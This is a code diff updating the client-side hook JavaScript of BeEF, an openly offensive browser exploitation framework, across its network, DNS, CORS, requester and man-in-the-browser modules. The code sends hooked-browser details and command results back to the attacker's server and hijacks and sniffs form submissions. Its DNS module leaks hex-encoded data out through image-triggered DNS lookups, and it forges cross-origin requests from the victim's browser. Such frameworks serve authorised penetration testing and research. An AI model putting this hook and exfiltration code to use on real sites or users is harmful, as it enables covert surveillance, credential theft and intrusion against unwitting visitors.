+
+            // Collect selected options from the form.
+            var selects = form.getElementsByTagName("select");
+            for (var i = 0; i < selects.length; i++) {
+                var select = selects[i];
+                query += select.name + "=" + select.options[select.selectedIndex].value + '&';
+            }
+
+            // We should be gathering 'submit' inputs as well, as there are 
+            // applications demanding this parameter.
+            var submit = $j('*[type="submit"]', form);
+            if(submit.length) {
+                // Append name of the submit button/input.
+                query += submit.attr('name') + '=' + submit.attr('value');
+            }
+
+            if(query.slice(-1) == '&') {
+                query = query.slice(0, -1);
+            }
+
             e.preventdefault;
             beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
             history.pushState({ Be:"EF" }, "", form.action);
@@ -198,7 +219,7 @@ beef.mitb = {
             beef.mitb.sniff("GET: " + url);
 
         } catch (x) {
-            // the link is cross-domain, so load the resource in a different tab
+            // the link is cross-origin, so load the resource in a different tab
             window.open(url);
             beef.mitb.sniff("GET [New Window]: " + url);
         }
@@ -219,4 +240,4 @@ beef.mitb = {
     }
 };
 
-beef.regCmp('beef.mitb');
+beef.regCmp('beef.mitb');

core/main/client/net.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -18,23 +18,24 @@
  */
 beef.net = {
 
-    host:"<%= @beef_host %>",
-    port:"<%= @beef_port %>",
-    hook:"<%= @beef_hook %>",
-    httpproto:"<%= @beef_proto %>",
-    handler:'/dh',
-    chop:500,
-    pad:30, //this is the amount of padding for extra params such as pc, pid and sid
-    sid_count:0,
-    cmd_queue:[],
+    host: "<%= @beef_host %>",
+    port: "<%= @beef_port %>",
+    hook: "<%= @beef_hook %>",
+    httpproto: "<%= @beef_proto %>",
+    handler: '/dh',
+    chop: 500,
+    pad: 30, //this is the amount of padding for extra params such as pc, pid and sid
+    sid_count: 0,
+    cmd_queue: [],
 
     /**
      * Command object. This represents the data to be sent back to BeEF,
      * using the beef.net.send() method.
      */
-    command:function () {
+    command: function () {
         this.cid = null;
         this.results = null;
+        this.status = null;
         this.handler = null;
         this.callback = null;
     },
@@ -42,7 +43,7 @@ beef.net = {
     /**
      * Packet object. A single chunk of data. X packets -> 1 stream
      */
-    packet:function () {
+    packet: function () {
         this.id = null;
         this.data = null;
     },
@@ -50,7 +51,7 @@ beef.net = {
     /**
      * Stream object. Contains X packets, which are command result chunks.
      */
-    stream:function () {
+    stream: function () {
         this.id = null;
         this.packets = [];
         this.pc = 0;
@@ -58,8 +59,8 @@ beef.net = {
             return (this.url + this.handler + '?' + 'bh=' + beef.session.get_hook_session_id()).length;
         };
         this.get_packet_data = function () {
-             var p = this.packets.shift();
-             return {'bh':beef.session.get_hook_session_id(), 'sid':this.id, 'pid':p.id, 'pc':this.pc, 'd':p.data }
+            var p = this.packets.shift();
+            return {'bh': beef.session.get_hook_session_id(), 'sid': this.id, 'pid': p.id, 'pc': this.pc, 'd': p.data }
         };
     },
 
@@ -68,10 +69,10 @@ beef.net = {
      * NOTE: as we are using async mode, the response object will be empty if returned.
      * Using sync mode, request obj fields will be populated.
      */
-    response:function () {
+    response: function () {
         this.status_code = null;        // 500, 404, 200, 302
         this.status_text = null;        // success, timeout, error, ...
-        this.response_body = null;      // "<html>…." if not a cross domain request
+        this.response_body = null;      // "<html>…." if not a cross-origin request
         this.port_status = null;        // tcp port is open, closed or not http
         this.was_cross_domain = null;   // true or false
         this.was_timedout = null;       // the user specified timeout was reached
@@ -84,13 +85,15 @@ beef.net = {
      * @param: {String} handler: the server-side handler that will be called
      * @param: {Integer} cid: command id
      * @param: {String} results: the data to send
+     * @param: {Integer} status: the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
      * @param: {Function} callback: the function to call after execution
      */
-    queue:function (handler, cid, results, callback) {
+    queue: function (handler, cid, results, status, callback) {
         if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
             var s = new beef.net.command();
             s.cid = cid;
             s.results = beef.net.clean(results);
+            s.status = status;
             s.callback = callback;
             s.handler = handler;
             this.cmd_queue.push(s);
@@ -105,22 +108,32 @@ beef.net = {
      * @param: {String} handler: the server-side handler that will be called
      * @param: {Integer} cid: command id
      * @param: {String} results: the data to send
+     * @param: {Integer} exec_status: the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
      * @param: {Function} callback: the function to call after execution
+     * @return: {Integer} exec_status: the command module execution status (defaults to 0 - 'unknown' if status is null)
      */
-    send:function (handler, cid, results, callback) {
+    send: function (handler, cid, results, exec_status, callback) {
+        // defaults to 'unknown' execution status if no parameter is provided, otherwise set the status
+        var status = 0;
+        if (exec_status != null && parseInt(Number(exec_status)) == exec_status){ status = exec_status}
+
         if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
-            this.queue(handler, cid, results, callback);
+            this.queue(handler, cid, results, status, callback);
             this.flush();
-        }else {
+        } else {
             try {
                 beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
                     '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
-                    '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
-            }catch (e) {
-                this.queue(handler, cid, results, callback);
+                    '", "status": "' + exec_status +
+                    '", "callback": "' + callback +
+                    '","bh":"' + beef.session.get_hook_session_id() + '" }');
+            } catch (e) {
+                this.queue(handler, cid, results, status, callback);
                 this.flush();
             }
         }
+
+        return status;
     },
 
     /**
@@ -131,7 +144,7 @@ beef.net = {
      * XHR-polling mechanism. If WebSockets are used, the data is sent
      * back to BeEF straight away.
      */
-    flush:function () {
+    flush: function (callback) {
         if (this.cmd_queue.length > 0) {
             var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
             this.cmd_queue.length = 0;
@@ -149,7 +162,11 @@ beef.net = {
                     stream.packets.push(packet);
                 }
                 stream.pc = stream.packets.length;
-                this.push(stream);
+                this.push(stream, callback);
+            }
+        } else {
+            if ((typeof callback != 'undefined') && (callback != null)) {
+                callback();
             }
         }
     },
@@ -159,7 +176,7 @@ beef.net = {
      * @param: {String} str: the input data
      * @param: {Integer} amount: chunk length
      */
-    chunk:function (str, amount) {
+    chunk: function (str, amount) {
         if (typeof amount == 'undefined') n = 2;
         return str.match(RegExp('.{1,' + amount + '}', 'g'));
     },
@@ -169,10 +186,18 @@ beef.net = {
      * It uses beef.net.request to send back the data.
      * @param: {Object} stream: the stream object to be sent back.
      */
-    push:function (stream) {
+    push: function (stream, callback) {
         //need to implement wait feature here eventually
+        if (typeof callback === 'undefined') {
+            callback = null;
+        }
         for (var i = 0; i < stream.pc; i++) {
-            this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
+            var cb = null;
+            if (i == (stream.pc - 1)) {
+                cb = callback;
+            }
+            this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, 
+                    stream.get_packet_data(), 10, 'text', cb);
         }
     },
 
@@ -191,11 +216,11 @@ beef.net = {
      *
      * @return: {Object} response: this object contains the response details
      */
-    request:function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
+    request: function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
         //check if same domain or cross domain
         var cross_domain = true;
-		if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
-            if(document.location.port == "" || document.location.port == null){
+        if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
+            if (document.location.port == "" || document.location.port == null) {
                 cross_domain = !(port == "80" || port == "443");
             }
         }
@@ -220,29 +245,29 @@ beef.net = {
          * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
          * This will turn POSTs into GETs for remote-domain requests.
          */
-        if (method == "POST"){
-           $j.ajaxSetup({
-              dataType: dataType
-           });
+        if (method == "POST") {
+            $j.ajaxSetup({
+                dataType: dataType
+            });
         } else {
-           $j.ajaxSetup({
+            $j.ajaxSetup({
                 dataType: 'script'
-           });
+            });
         }
 
         //build and execute the request
-        $j.ajax({type:method,
-            url:url,
-            data:data,
-            timeout:(timeout * 1000),
+        $j.ajax({type: method,
+            url: url,
+            data: data,
+            timeout: (timeout * 1000),
 
             //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
-            beforeSend:function (xhr) {
+            beforeSend: function (xhr) {
                 if (method == "POST") {
                     xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                 }
             },
-            success:function (data, textStatus, xhr) {
+            success: function (data, textStatus, xhr) {
                 var end_time = new Date().getTime();
                 response.status_code = xhr.status;
                 response.status_text = textStatus;
@@ -251,14 +276,15 @@ beef.net = {
                 response.was_timedout = false;
                 response.duration = (end_time - start_time);
             },
-            error:function (jqXHR, textStatus, errorThrown) {
+            error: function (jqXHR, textStatus, errorThrown) {
                 var end_time = new Date().getTime();
                 response.response_body = jqXHR.responseText;
                 response.status_code = jqXHR.status;
                 response.status_text = textStatus;
                 response.duration = (end_time - start_time);
+                response.port_status = "open";
             },
-            complete:function (jqXHR, textStatus) {
+            complete: function (jqXHR, textStatus) {
                 response.status_code = jqXHR.status;
                 response.status_text = textStatus;
                 response.headers = jqXHR.getAllResponseHeaders();
@@ -273,7 +299,7 @@ beef.net = {
                     response.port_status = "open";
                 }
             }
-        }).done(function () {
+        }).always(function () {
                 if (callback != null) {
                     callback(response);
                 }
@@ -287,18 +313,26 @@ beef.net = {
      *  - allowCrossDomain: set cross-domain requests as allowed or blocked
      *
      * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
+     * Example usage:
+     * beef.net.forge_request("http", "POST", "172.20.40.50", 8080, "/lulz",
+     *   true, null, { foo: "bar" }, 5, 'html', false, null, function(response) {
+     *   alert(response.response_body)})
      */
-    forge_request:function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
+    forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
+
+        if (domain == "undefined" || path == "undefined") {
+            beef.debug("[beef.net.forge_request] Error: Malformed request. No host specified.");
+            return;
+        }
 
         // check if same domain or cross domain
         var cross_domain = true;
-
-        if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
-           if(document.location.port == "" || document.location.port == null){
-               cross_domain = !(port == "80" || port == "443");
-           } else {
-              if (document.location.port == port) cross_domain = false;
-           }
+        if (document.domain == domain && document.location.protocol == scheme + ':') {
+            if (document.location.port == "" || document.location.port == null) {
+                cross_domain = !(port == "80" || port == "443");
+            } else {
+                if (document.location.port == port) cross_domain = false;
+            }
         }
 
         // build the url
@@ -319,13 +353,27 @@ beef.net = {
 
         // if cross-domain requests are not allowed and the request is cross-domain
         // don't proceed and return
-        if (allowCrossDomain == "false" && cross_domain && callback != null) {
+        if (allowCrossDomain == "false" && cross_domain) {
+            beef.debug("[beef.net.forge_request] Error: Cross Domain Request. The request was not sent.");
             response.status_code = -1;
             response.status_text = "crossdomain";
             response.port_status = "crossdomain";
             response.response_body = "ERROR: Cross Domain Request. The request was not sent.\n";
             response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
-            callback(response, requestid);
+            if (callback != null) callback(response, requestid);
+            return response;
+        }
+
+        // if the request was cross-domain from a HTTPS origin to HTTP
+        // don't proceed and return
+        if (document.location.protocol == 'https:' && scheme == 'http') {
+            beef.debug("[beef.net.forge_request] Error: Mixed Active Content. The request was not sent.");
+            response.status_code = -1;
+            response.status_text = "mixedcontent";
+            response.port_status = "mixedcontent";
+            response.response_body = "ERROR: Mixed Active Content. The request was not sent.\n";
+            response.headers = "ERROR: Mixed Active Content. The request was not sent.\n";
+            if (callback != null) callback(response, requestid);
             return response;
         }
 
@@ -333,7 +381,7 @@ beef.net = {
          * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
          * This will turn POSTs into GETs for remote-domain requests.
          */
-        if (method == "POST"){
+        if (method == "POST") {
             $j.ajaxSetup({
                 dataType: dataType
             });
@@ -343,8 +391,8 @@ beef.net = {
             });
         }
 
-		// this is required for bugs in IE so data can be transferred back to the server
-        if ( beef.browser.isIE() ) {
+        // this is required for bugs in IE so data can be transferred back to the server
+        if (beef.browser.isIE()) {
             dataType = 'script'
         }
 
@@ -355,14 +403,16 @@ beef.net = {
             timeout: (timeout * 1000),
 
             //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
-            beforeSend:function (xhr) {
+            beforeSend: function (xhr) {
                 if (method == "POST") {
                     xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                 }
             },
 
+            data: data,
+
             // http server responded successfully
-            success:function (data, textStatus, xhr) {
+            success: function (data, textStatus, xhr) {
                 var end_time = new Date().getTime();
                 response.status_code = xhr.status;
                 response.status_text = textStatus;
@@ -373,7 +423,7 @@ beef.net = {
 
             // server responded with a http error (403, 404, 500, etc)
             // or server is not a http server
-            error:function (xhr, textStatus, errorThrown) {
+            error: function (xhr, textStatus, errorThrown) {
                 var end_time = new Date().getTime();
                 response.response_body = xhr.responseText;
                 response.status_code = xhr.status;
@@ -381,33 +431,33 @@ beef.net = {
                 response.duration = (end_time - start_time);
             },
 
-            complete:function (xhr, textStatus) {
+            complete: function (xhr, textStatus) {
                 // cross-domain request
                 if (cross_domain) {
 
-					response.port_status = "crossdomain";
+                    response.port_status = "crossdomain";
 
                     if (xhr.status != 0) {
-						response.status_code = xhr.status;
-					} else {
-						response.status_code = -1;
-					}
+                        response.status_code = xhr.status;
+                    } else {
+                        response.status_code = -1;
+                    }
 
-					if (textStatus) {
-                    	response.status_text = textStatus;
-					} else {
-						response.status_text = "crossdomain";
-					}
+                    if (textStatus) {
+                        response.status_text = textStatus;
+                    } else {
+                        response.status_text = "crossdomain";
+                    }
 
-					if (xhr.getAllResponseHeaders()) {
-	                    response.headers = xhr.getAllResponseHeaders();
-					} else {
-						response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
-					}
+                    if (xhr.getAllResponseHeaders()) {
+                        response.headers = xhr.getAllResponseHeaders();
+                    } else {
+                        response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+                    }
 
-					if (!response.response_body) {
-						response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
-					}
+                    if (!response.response_body) {
+                        response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+                    }
 
                 } else {
                     // same-domain request
@@ -420,8 +470,16 @@ beef.net = {
                         response.was_timedout = true;
                         response.response_body = "ERROR: Timed out\n";
                         response.port_status = "closed";
+                        /*
+                         * With IE we need to explicitly set the dataType to "script",
+                         * so there will be always parse-errors if the content is != javascript
+                         * */
                     } else if (textStatus == "parsererror") {
                         response.port_status = "not-http";
+                        if (beef.browser.isIE()) {
+                            response.status_text = "success";
+                            response.port_status = "open";
+                        }
                     } else {
                         response.port_status = "open";
                     }
@@ -434,7 +492,7 @@ beef.net = {
 
     //this is a stub, as associative arrays are not parsed by JSON, all key / value pairs should use new Object() or {}
     //http://andrewdupont.net/2006/05/18/javascript-associative-arrays-considered-harmful/
-    clean:function (r) {
+    clean: function (r) {
         if (this.array_has_string_key(r)) {
             var obj = {};
             for (var key in r)
@@ -445,7 +503,7 @@ beef.net = {
     },
 
     //Detects if an array has a string key
-    array_has_string_key:function (arr) {
+    array_has_string_key: function (arr) {
         if ($j.isArray(arr)) {
             try {
                 for (var key in arr)
@@ -456,13 +514,47 @@ beef.net = {
         return false;
     },
 
+    /**
+     * Checks if the specified port is valid
+     */
+    is_valid_port: function (port) {
+      if (isNaN(port)) return false;
+      if (port > 65535 || port < 0) return false;
+      return true;
+    },
+
+    /**
+     * Checks if the specified IP address is valid
+     */
+    is_valid_ip: function (ip) {
+      if (ip == null) return false;
+      var ip_match = ip.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
+      if (ip_match == null) return false;
+      return true;
+    },
+
+    /**
+     * Checks if the specified IP address range is valid
+     */
+    is_valid_ip_range: function (ip_range) {
+      if (ip_range == null) return false;
+      var range_match = ip_range.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
+      if (range_match == null || range_match[1] == null) return false;
+      return true;
+    },
+
     /**
      * Sends back browser details to framework, calling beef.browser.getDetails()
      */
-    browser_details:function () {
+    browser_details: function () {
         var details = beef.browser.getDetails();
+        var res = null;
         details['HookSessionID'] = beef.session.get_hook_session_id();
         this.send('/init', 0, details);
+        if(details != null)
+            res = true;
+
+        return res;
     }
 
 };

core/main/client/net/connection.js

@@ -0,0 +1,47 @@
+//
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// beef.net.connection - wraps Mozilla's Network Information API
+// https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation
+// https://developer.mozilla.org/en-US/docs/Web/API/Navigator/connection
+beef.net.connection = {
+
+  /* Returns the connection type
+   * @example: beef.net.connection.type()
+   * @note: https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/type
+   * @return: {String} connection type or 'unknown'.
+   **/
+  type: function () {
+    try {
+      var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
+      var type = connection.type;
+      if (/^[a-z]+$/.test(type)) return type; else return 'unknown';
+    } catch(e) {
+      beef.debug("Error retrieving connection type: " + e.message);
+      return 'unknown';
+    }
+  },
+
+  /* Returns the maximum downlink speed of the connection
+   * @example: beef.net.connection.downlinkMax()
+   * @note: https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/downlinkMax
+   * @return: {String} downlink max or 'unknown'.
+   **/
+  downlinkMax: function () {
+    try {
+      var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
+      var max = connection.downlinkMax;
+      if (max) return max; else return 'unknown';
+    } catch(e) {
+      beef.debug("Error retrieving connection downlink max: " + e.message);
+      return 'unknown';
+    }
+  }
+
+};
+
+beef.regCmp('beef.net.connection');
+

core/main/client/net/cors.js

@@ -12,14 +12,15 @@ beef.net.cors = {
     },
 
     /**
-     * Make a cross-domain request using CORS
+     * Make a cross-origin request using CORS
      *
      * @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
      * @param url {String} url
      * @param data {String} request body
+     * @param timeout {Integer} request timeout in milliseconds
      * @param callback {Function} function to callback on completion
      */
-    request: function(method, url, data, callback) {
+    request: function(method, url, data, timeout, callback) {
 
     var xhr;
     var response = new this.response;
@@ -29,6 +30,7 @@ beef.net.cors = {
 
         if ('withCredentials' in xhr) {
             xhr.open(method, url, true);
+            xhr.timeout = parseInt(timeout, 10);
             xhr.onerror = function() {
             };
             xhr.onreadystatechange = function() {

core/main/client/net/dns.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -18,49 +18,67 @@ beef.net.dns = {
 
 	handler: "dns",
 
-	send: function(msgId, messageString, domain, wait, callback) {
+	send: function(msgId, data, domain, callback) {
 
-		var dom = document.createElement('b');
+        var encode_data = function(str) {
+            var result="";
+            for(i=0;i<str.length;++i) {
+                result+=str.charCodeAt(i).toString(16).toUpperCase();
+            }
+            return result;
+        };
 
-		// DNS settings
-		var max_domain_length = 255-5-5-5-5-5;
-		var max_segment_length = max_domain_length - domain.length;
+        var encodedData = encodeURI(encode_data(data));
 
-		// splits strings into chunks
-		String.prototype.chunk = function(n) {
-			if (typeof n=='undefined') n=100;
-			return this.match(RegExp('.{1,'+n+'}','g'));
-		};
+        beef.debug(encodedData);
+        beef.debug("_encodedData_ length: " + encodedData.length);
 
-		// XORs a string
-		xor_encrypt = function(str, key) {
-			var result="";
-			for(i=0;i<str.length;++i) {
-				result+=String.fromCharCode(key^str.charCodeAt(i));
-			}
-			return result;
-		};
+        // limitations to DNS according to RFC 1035:
+        // o Domain names must only consist of a-z, A-Z, 0-9, hyphen (-) and fullstop (.) characters
+        // o Domain names are limited to 255 characters in length (including dots)
+        // o The name space has a maximum depth of 127 levels (ie, maximum 127 subdomains)
+        // o Subdomains are limited to 63 characters in length (including the trailing dot)
 
-		// sends a DNS request
-		sendQuery = function(query) {
-			beef.debug("Requesting: "+query);
-			var img = new Image;
-			img.src = "http://"+query;
-			img.onload = function() { dom.removeChild(this); }
-			img.onerror = function() { dom.removeChild(this); }
-			dom.appendChild(img);
-		};
+        // DNS request structure:
+        // COMMAND_ID.SEQ_NUM.SEQ_TOT.DATA.DOMAIN
+      //max_length: 3.   3   .   3   . 63 . x
 
-		// encode message
-		var xor_key = Math.floor(Math.random()*99000+1000);
-		encoded_message = encodeURI(xor_encrypt(messageString, xor_key)).replace(/%/g,".");
+        // only max_data_segment_length is currently used to split data into chunks. and only 1 chunk is used per request.
+        // for optimal performance, use the following vars and use the whole available space (which needs changes server-side too)
+        var reserved_seq_length = 3 + 3 + 3 + 3; // consider also 3 dots
+        var max_domain_length = 255 - reserved_seq_length; //leave some space for sequence numbers
+        var max_data_segment_length = 63; // by RFC
 
-		// Split message into segments
-		segments = encoded_message.chunk(max_segment_length)
-		for (seq=1; seq<=segments.length; seq++) {
-			// send segment
-			sendQuery(msgId+"."+seq+"."+segments.length+"."+xor_key+segments[seq-1]+"."+domain);
-		}
+        beef.debug("max_data_segment_length: " + max_data_segment_length);
+
+        var dom = document.createElement('b');
+
+        String.prototype.chunk = function(n) {
+            if (typeof n=='undefined') n=100;
+            return this.match(RegExp('.{1,'+n+'}','g'));
+        };
+
+        var sendQuery = function(query) {
+            var img = new Image;
+            //img.src = "http://"+query;
+            img.src = beef.net.httpproto + "://" + query; // prevents issues with mixed content
+            img.onload = function() { dom.removeChild(this); }
+            img.onerror = function() { dom.removeChild(this); }
+            dom.appendChild(img);
+
+            //experimental
+            //setTimeout(function(){dom.removeChild(img)},1000);
+        };
+
+        var segments = encodedData.chunk(max_data_segment_length);
+
+        var ident = "0xb3"; //see extensions/dns/dns.rb, useful to explicitly mark the DNS request as a tunnel request
+
+        beef.debug(segments.length);
+
+        for (var seq=1; seq<=segments.length; seq++) {
+            sendQuery(ident + msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);
+        }
 
 		// callback - returns the number of queries sent
 		if (!!callback) callback(segments.length);

core/main/client/net/local.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/net/portscanner.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/net/requester.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -19,11 +19,11 @@ beef.net.requester = {
 	handler: "requester",
 	
 	send: function(requests_array) {
-
-        for (i in requests_array) {
+        for(var i=0; i<requests_array.length; i++){
             request = requests_array[i];
-
-            beef.net.forge_request('http', request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
+            if (request.proto == 'https') var scheme = 'https'; else var scheme = 'http';
+            beef.debug('[Requester] ' + request.method + ' ' + scheme + '://' + request.host + ':' + request.port + request.uri + ' - Data: ' + request.data);
+            beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
                                        function(res, requestid) { beef.net.send('/requester', requestid, {
                                            response_data: res.response_body,
                                            response_status_code: res.status_code,
@@ -32,8 +32,6 @@ beef.net.requester = {
                                            response_headers: res.headers});
                                        }
                                  );
-
-
         }
     }
 };